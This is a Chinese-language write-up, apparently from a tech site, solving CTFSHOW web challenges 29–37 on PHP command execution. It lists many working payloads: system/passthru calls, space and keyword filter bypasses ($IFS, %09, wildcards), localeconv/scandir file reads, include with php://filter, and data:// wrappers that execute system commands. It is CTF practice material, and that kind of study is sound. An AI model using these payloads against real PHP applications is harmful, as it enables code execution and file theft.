| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> CTFSHOW WEB入门 命令执行 -> 正文阅读 |
|
[PHP知识库]CTFSHOW WEB入门 命令执行 |
web29题目描述 ?审计
主要是进行了对flag的过滤,所以使用通配符来绕过 1、执行系统命令 system:执行系统命令 http://ec01fa2a-e9a2-4d02-b42b-a19d6c8c3a35.challenge.ctf.show/?c=system(%22ls%22); 发现flag.php 2、将flag.php复制到1.txt 3、查看flag http://ec01fa2a-e9a2-4d02-b42b-a19d6c8c3a35.challenge.ctf.show/1.txt ?web30审计
这次过滤了system函数还要php 所以我们可以看一看php还有其他那些命令执行的函数 system($cmd); (119条消息) php 执行命令函数_哈尔滨洛弘科技有限公司的博客-CSDN博客_php命令执行函数 所以尝试使用别的命令执行函数 发现passthru()可以用,所以 1、查看文件 http://85ac1890-2027-4ca0-87be-a033538dbe10.challenge.ctf.show/?c=passthru("ls"); 2、?将flag.php复制到2.txt 3、查看2.txt ??????http://85ac1890-2027-4ca0-87be-a033538dbe10.challenge.ctf.show/2.txt web31审计
主要是这次把空格和.也过滤了 linux适用空格绕过: 1、过滤了system所以还是用passthru来查看下文件 http://d66a5206-8a5c-454d-af7e-0e5f9d665149.challenge.ctf.show/?c=passthru(%22ls%22); 2、因为过滤了.所以要使用.怎么办呢 使用localeconv()这个函数,返回的第一位是小数点字符,使用这个就可以了 3、?c=print_r(show_source(scandir(current(localeconv()))[2])); 这样就可以得到flag.php 再show_source得到flag ?c=print_r(show_source(scandir(current(localeconv()))[2])); 尝试一下别的方式(看下别人的wp) 1、?c=echo(`more%09fl*`);? ? ? ?页面里看不到,因为被当做php代码放在源码那里? ? ? ? ? 2、?c=eval($_GET[1]);&1=system("nl flag.php"); 3、?c=print_r(show_source(scandir(dirname(__FILE__))[2])); 4、?c=echo`strings%09f*`; 5、?c=echo(`strings%09f*`); 6、?c=echo(`strings\$IFS\$9f*`); web32审计
这次又多过滤了
1、首先构造文件包含的payloadhttp://3ad2c154-7824-424e-a23c-93d93dadc357.challenge.ctf.show/?c=include%0a$_POST[1]?> 2、然后需要利用php伪协议读取文件 1=php://filter/read=convert.base64-encode/resource=flag.php 另一个姿势 1、第一步和上面一样 2、第二步使用data伪协议 1=data://text/plain,<?php%20system("cp flag.php 1.txt");?> 3、访问1.txt得到flag web33和32一样,通杀 web34一样通杀 WEB35还是一样 WEB36过滤了0-9,所以$_POST[1]改成$_POST[a]就可以了 WEB37第一步 ?c=data://text/plain,<?php system("ls");?>? 第二步 ?c=data://text/plain,<?php system("cp fla* 1.txt");?>? web32hint: c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64- encode/resource=flag.php web33hint: c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64- encode/resource=flag.php web34hint:? c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php web35hint: c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php web36hint: c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/23 7:14:16- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |